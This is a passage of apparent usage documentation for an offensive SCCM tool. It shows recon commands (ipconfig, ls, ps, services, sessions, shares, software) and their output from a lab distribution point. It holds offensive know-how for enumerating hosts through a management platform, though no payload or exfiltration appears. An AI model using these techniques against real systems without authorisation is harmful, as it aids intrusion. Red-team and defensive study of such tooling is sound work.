                    | <SYSTEM>\ComSpec                  | <SYSTEM>\ComSpec                  | ComSpec                | OK       | True             | <SYSTEM>                     |            
                    %SystemRoot%\system32\cmd.exe                                                                                                              | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\DriverData               | <SYSTEM>\DriverData               | DriverData             | OK       | True             | <SYSTEM>                     |            
                    C:\Windows\System32\Drivers\DriverData                                                                                                     | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\OS                       | <SYSTEM>\OS                       | OS                     | OK       | True             | <SYSTEM>                     | Windows_NT 
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\Path                     | <SYSTEM>\Path                     | Path                   | OK       | True             | <SYSTEM>                     |            
                    %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\ | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PATHEXT                  | <SYSTEM>\PATHEXT                  | PATHEXT                | OK       | True             | <SYSTEM>                     |            
                    .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC                                                                                      | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PROCESSOR_ARCHITECTURE   | <SYSTEM>\PROCESSOR_ARCHITECTURE   | PROCESSOR_ARCHITECTURE | OK       | True             | <SYSTEM>                     | AMD64      
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PSModulePath             | <SYSTEM>\PSModulePath             | PSModulePath           | OK       | True             | <SYSTEM>                     |            
                    %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules                                              | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\TEMP                     | <SYSTEM>\TEMP                     | TEMP                   | OK       | True             | <SYSTEM>                     |            
                    %SystemRoot%\TEMP                                                                                                                          | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\TMP                      | <SYSTEM>\TMP                      | TMP                    | OK       | True             | <SYSTEM>                     |            
                    %SystemRoot%\TEMP                                                                                                                          | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\USERNAME                 | <SYSTEM>\USERNAME                 | USERNAME               | OK       | True             | <SYSTEM>                     | SYSTEM     
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\windir                   | <SYSTEM>\windir                   | windir                 | OK       | True             | <SYSTEM>                     |            
                    %SystemRoot%                                                                                                                               | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\NUMBER_OF_PROCESSORS     | <SYSTEM>\NUMBER_OF_PROCESSORS     | NUMBER_OF_PROCESSORS   | OK       | True             | <SYSTEM>                     | 2          
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PROCESSOR_LEVEL          | <SYSTEM>\PROCESSOR_LEVEL          | PROCESSOR_LEVEL        | OK       | True             | <SYSTEM>                     | 6          
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PROCESSOR_IDENTIFIER     | <SYSTEM>\PROCESSOR_IDENTIFIER     | PROCESSOR_IDENTIFIER   | OK       | True             | <SYSTEM>                     | Intel64    
                    Family 6 Model 140 Stepping 1, GenuineIntel                                                                                        | DP       |                            
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\PROCESSOR_REVISION       | <SYSTEM>\PROCESSOR_REVISION       | PROCESSOR_REVISION     | OK       | True             | <SYSTEM>                     | 8c01       
                    | DP       |                                                                                                                                                               
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | <SYSTEM>\UATDATA                  | <SYSTEM>\UATDATA                  | UATDATA                | OK       | True             | <SYSTEM>                     |            
                    C:\Windows\CCM\UATData\D9F8C395-CAB8-491d-B8AC-179A1FE1BE77                                                                                | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\SYSTEM\Path          | NT AUTHORITY\SYSTEM\Path          | Path                   | OK       | False            | NT AUTHORITY\SYSTEM          |            
                    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;                                                                                         | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\SYSTEM\TEMP          | NT AUTHORITY\SYSTEM\TEMP          | TEMP                   | OK       | False            | NT AUTHORITY\SYSTEM          |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\SYSTEM\TMP           | NT AUTHORITY\SYSTEM\TMP           | TMP                    | OK       | False            | NT AUTHORITY\SYSTEM          |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\LOCAL SERVICE\Path   | NT AUTHORITY\LOCAL SERVICE\Path   | Path                   | OK       | False            | NT AUTHORITY\LOCAL SERVICE   |            
                    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;                                                                                         | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\LOCAL SERVICE\TEMP   | NT AUTHORITY\LOCAL SERVICE\TEMP   | TEMP                   | OK       | False            | NT AUTHORITY\LOCAL SERVICE   |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\LOCAL SERVICE\TMP    | NT AUTHORITY\LOCAL SERVICE\TMP    | TMP                    | OK       | False            | NT AUTHORITY\LOCAL SERVICE   |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\NETWORK SERVICE\Path | NT AUTHORITY\NETWORK SERVICE\Path | Path                   | OK       | False            | NT AUTHORITY\NETWORK SERVICE |            
                    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;                                                                                         | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\NETWORK SERVICE\TEMP | NT AUTHORITY\NETWORK SERVICE\TEMP | TEMP                   | OK       | False            | NT AUTHORITY\NETWORK SERVICE |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | NT AUTHORITY\NETWORK SERVICE\TMP  | NT AUTHORITY\NETWORK SERVICE\TMP  | TMP                    | OK       | False            | NT AUTHORITY\NETWORK SERVICE |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | DP\Administrator\Path             | DP\Administrator\Path             | Path                   | OK       | False            | DP\Administrator             |            
                    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;                                                                                         | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | DP\Administrator\TEMP             | DP\Administrator\TEMP             | TEMP                   | OK       | False            | DP\Administrator             |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | DP\Administrator\TMP              | DP\Administrator\TMP              | TMP                    | OK       | False            | DP\Administrator             |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | LAB\Administrator\Path            | LAB\Administrator\Path            | Path                   | OK       | False            | LAB\Administrator            |            
                    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;                                                                                         | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | LAB\Administrator\TEMP            | LAB\Administrator\TEMP            | TEMP                   | OK       | False            | LAB\Administrator            |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | LAB\Administrator\TMP             | LAB\Administrator\TMP             | TMP                    | OK       | False            | LAB\Administrator            |            
                    %USERPROFILE%\AppData\Local\Temp                                                                                                           | DP       |                    
                    +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
(16777221) (C:\) >> 

ipconfig

Description

Run ipconfig on the interactive host and retrieve networking info.

Usage

ipconfig

Example

(16777221) (C:\) >> ipconfig 
[19:42:23] INFO     Tasked SCCM to run IPCONFIG.                                                                                                                                               
[19:42:27] INFO     Got OperationId 16779670. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:42:39] INFO     +------------------+--------------+--------------------------------------------+----------+---------------+----------------------+-----------------------------+----------+
                    | InterfaceAlias   | Name         | InterfaceDescription                       | Status   | IPV4Address   | IPV4DefaultGateway   | DNSServerList               | Device   |
                    +==================+==============+============================================+==========+===============+======================+=============================+==========+
                    | Ethernet0        | internal.lab | Intel(R) 82574L Gigabit Network Connection | Up       | 10.10.100.11  | 10.10.100.10         | 10.10.100.100; 10.10.100.10 | DP       |
                    +------------------+--------------+--------------------------------------------+----------+---------------+----------------------+-----------------------------+----------+
(16777221) (C:\) >> 

list_disk

Description

Lists available disk drives on the interactive system

Usage

list_disk

Example

(16777221) (C:\) >> list_disk 
[19:43:02] INFO     Tasked SCCM to show mounted drives on 16777221.                                                                                                                            
[19:43:04] INFO     Got OperationId 16779671. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:43:17] INFO     +------------------+-----------+------------+----------+                                                                                                                   
                    | Description      | Caption   | DeviceID   | Device   |                                                                                                                   
                    +==================+===========+============+==========+                                                                                                                   
                    | Local Fixed Disk | C:        | C:         | DP       |                                                                                                                   
                    +------------------+-----------+------------+----------+                                                                                                                   
                    | CD-ROM Disc      | nan       | D:         | DP       |                                                                                                                   
                    +------------------+-----------+------------+----------+                                                                                                                   
(16777221) (C:\) >> 

ls

Description

Will list the contents of the current directory represented on the command line. Defaults to C:. You must issue a cd command to another known directory (i.e. cd C:\Users to list the contents of that Users directory and so on.

Usage

ls

Example

(16777221) (C:\) >> ls
[19:43:31] INFO     Tasked SCCM to list files in C:\.                                                                                                                                          
[19:43:33] INFO     Got OperationId 16779672. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:43:47] INFO     +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | FileName                     | Mode   | LastWriteTime       |   Size | Device   |                                                                                        
                    +==============================+========+=====================+========+==========+                                                                                        
                    | C:\$Recycle.Bin              | d--hs- | 2024-01-27 06:07:22 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\$WinREAgent               | d--h-- | 2024-01-27 14:07:43 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Documents and Settings    | d--hsl | 2024-01-27 21:59:32 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\inetpub                   | d----- | 2024-01-27 20:31:16 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\PerfLogs                  | d----- | 2021-05-08 08:20:24 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Program Files             | d-r--- | 2024-01-27 16:25:43 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Program Files (x86)       | d----- | 2021-05-08 09:40:21 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\ProgramData               | d--h-- | 2024-01-27 18:18:42 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Recovery                  | d--hs- | 2024-01-27 21:59:42 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\SCCMContentLib            | d----- | 2024-02-07 06:00:41 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\SMSPKGC$                  | d----- | 2024-02-07 06:00:46 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\SMSSIG$                   | d----- | 2024-02-07 06:00:50 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\SMS_DP$                   | d----- | 2024-02-07 06:00:57 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\System Volume Information | d--hs- | 2024-01-27 05:50:36 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Users                     | d-r--- | 2024-01-27 06:07:15 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
                    | C:\Windows                   | d----- | 2024-02-07 06:00:30 |      1 | DP       |                                                                                        
                    +------------------------------+--------+---------------------+--------+----------+                                                                                        
(16777221) (C:\) >> 

osinfo

Description

Query operating system and architecture info for the interactive device

Usage

Example

(16777221) (C:\) >> osinfo
[19:45:22] INFO     Tasked SCCM to show system info of 16777221.                                                                                                                               
[19:45:25] INFO     Got OperationId 16779673. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:45:35] INFO     +---------------------------------------------------+------------+------------------+----------+                                                                           
                    | Caption                                           | Version    | OSArchitecture   | Device   |                                                                           
                    +===================================================+============+==================+==========+                                                                           
                    | Microsoft Windows Server 2022 Standard Evaluation | 10.0.20348 | 64-bit           | DP       |                                                                           
                    +---------------------------------------------------+------------+------------------+----------+ 

ps

Description

List current running processes for the interactive device

Usage

ps

Example

(16777221) (C:\) >> ps
[19:45:52] INFO     Tasked SCCM to list processes.                                                                                                                                             
[19:45:53] INFO     Got OperationId 16779674. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:46:04] INFO     No results yet, sleeping 10 seconds.                                                                                                                                       
[19:46:16] INFO     +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | Name                |   ProcessId | CreationDate        |   WorkingSetSize |   HandleCount | Device   |                                                                  
                    +=====================+=============+=====================+==================+===============+==========+                                                                  
                    | System Idle Process |           0 | 2024-01-30 02:48:49 |             8192 |             0 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | System              |           4 | 2024-01-30 02:48:49 |           151552 |          1420 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | Registry            |         100 | 2024-01-30 02:48:43 |         75931648 |             0 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | smss.exe            |         300 | 2024-01-30 02:48:49 |          1298432 |            57 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | csrss.exe           |         408 | 2024-01-30 02:48:50 |          6266880 |           385 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | csrss.exe           |         504 | 2024-01-30 02:48:50 |          5976064 |           166 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | wininit.exe         |         512 | 2024-01-30 02:48:50 |          7131136 |           152 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | winlogon.exe        |         568 | 2024-01-30 02:48:50 |         10612736 |           200 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | services.exe        |         636 | 2024-01-30 02:48:50 |         12730368 |           394 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                    | lsass.exe           |         656 | 2024-01-30 02:48:50 |         20844544 |          1136 | DP       |                                                                  
                    +---------------------+-------------+---------------------+------------------+---------------+----------+                                                                  
                   
[------snipped for brevity------]
                                                                
(16777221) (C:\) >> 

services

Description

List current running services on the interactive device

Usage

services

Example

(16777221) (C:\) >> services 
[19:47:25] INFO     Tasked SCCM to list services.                                                                                                                                                                                      
[19:47:27] INFO     Got OperationId 16779676. Sleeping 10 seconds to wait for host to call home.                                                                                                                                       
[19:47:38] INFO     +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | Name                                     | PathName                                                                                 |   ProcessId | ServiceType   | Started   | Device   |                       
                    +==========================================+==========================================================================================+=============+===============+===========+==========+                       
                    | AJRouter                                 | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p                      |           0 | Share Process | False     | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | ALG                                      | C:\Windows\System32\alg.exe                                                              |           0 | Own Process   | False     | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | AppHostSvc                               | C:\Windows\system32\svchost.exe -k apphost                                               |        1172 | Share Process | True      | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | AppIDSvc                                 | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p                      |           0 | Share Process | False     | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | Appinfo                                  | C:\Windows\system32\svchost.exe -k netsvcs -p                                            |           0 | Share Process | False     | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+                       
                    | AppMgmt                                  | C:\Windows\system32\svchost.exe -k netsvcs -p                                            |           0 | Share Process | False     | DP       |                       
                    +------------------------------------------+------------------------------------------------------------------------------------------+-------------+---------------+-----------+----------+  
[--------snipped for brevity----------]
                   
(16777221) (C:\) >> 

sessions

Description

List active sessions on the interactive device

Usage

sessions

Example

(16777221) (C:\) >> sessions
[19:50:29] INFO     Tasked SCCM to show users currently signed in to 16777221.                                                                                                                                                         
[19:50:31] INFO     Got OperationId 16779679. Sleeping 10 seconds to wait for host to call home.                                                                                                                                       
[19:50:41] INFO     +---------------------+----------+                                                                                                                                                                                 
                    | UserName            | Device   |                                                                                                                                                                                 
                    +=====================+==========+                                                                                                                                                                                 
                    | DP\DefaultAppPool   | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
                    | DP\IUSR             | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
                    | DP\LOCAL SERVICE    | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
                    | DP\NETWORK SERVICE  | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
                    | LAB\Administrator   | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
                    | NT AUTHORITY\SYSTEM | DP       |                                                                                                                                                                                 
                    +---------------------+----------+                                                                                                                                                                                 
(16777221) (C:\) >> 

shares

Description

List all available file shares on the interactive device

Usage

shares

Example

(16777221) (C:\) >> shares
[19:51:39] INFO     Tasked SCCM to list file shares.                                                                                                                                                                                   
[19:51:41] INFO     Got OperationId 16779680. Sleeping 10 seconds to wait for host to call home.                                                                                                                                       
[19:51:52] INFO     +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | Name            | Description                                                      | Path              |       Type | AllowMaximum   | Device   |                                                                
                    +=================+==================================================================+===================+============+================+==========+                                                                
                    | ADMIN$          | Remote Admin                                                     | C:\Windows        | 2147483648 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | C$              | Default share                                                    | C:\               | 2147483648 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | IPC$            | Remote IPC                                                       |                   | 2147483651 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | SCCMContentLib$ | 'Configuration Manager' Content Library for site LAB (1/27/2024) | C:\SCCMContentLib |          0 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | SMSPKGC$        | SMS Site LAB DP 1/27/2024                                        | C:\SMSPKGC$       |          0 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | SMSSIG$         | SMS Site LAB DP 1/27/2024                                        | C:\SMSSIG$        |          0 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+                                                                
                    | SMS_DP$         | SMS Site LAB DP 1/27/2024                                        | C:\SMS_DP$        |          0 | True           | DP       |                                                                
                    +-----------------+------------------------------------------------------------------+-------------------+------------+----------------+----------+  

software

Description

List currently installed software on the interactive device

Usage

software

Example

(16777221) (C:\) >> software 
[19:52:10] INFO     Tasked SCCM to list software installed 16777221.                                                                                                                                                                   
[19:52:12] INFO     Got OperationId 16779681. Sleeping 10 seconds to wait for host to call home.                                                                                                                                       
[19:52:23] INFO     +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | ProductName                                                        | Publisher             | ProductVersion   | Device   |                                                                                       
                    +====================================================================+=======================+==================+==========+                                                                                       
                    | VMware Tools                                                       | VMware, Inc.          | 12.0.0.19345655  | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2019 X64 Additional Runtime - 14.29.30133     | Microsoft Corporation | 14.29.30133      | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.29.30133        | Microsoft Corporation | 14.29.30133      | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2019 X86 Additional Runtime - 14.29.30133     | Microsoft Corporation | 14.29.30133      | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Policy Platform                                          | Microsoft Corporation | 68.1.9086.1017   | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.29.30133        | Microsoft Corporation | 14.29.30133      | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Configuration Manager Client                                       | Microsoft Corporation | 5.00.9106.1000   | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Edge                                                     | Microsoft Corporation | 121.0.2277.106   | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Edge Update                                              |                       | 1.3.183.29       | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.29.30133 | Microsoft Corporation | 14.29.30133.0    | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30133 | Microsoft Corporation | 14.29.30133.0    | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
                    | Microsoft Windows Server 2022 Standard Evaluation                  | Microsoft Corporation | 10.0.20348       | DP       |                                                                                       
                    +--------------------------------------------------------------------+-----------------------+------------------+----------+                                                                                       
(16777221) (C:\) >>